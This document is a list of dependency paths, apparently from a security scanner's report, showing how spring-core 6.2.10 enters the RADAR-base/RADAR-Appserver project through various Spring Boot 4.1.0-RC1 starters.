Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
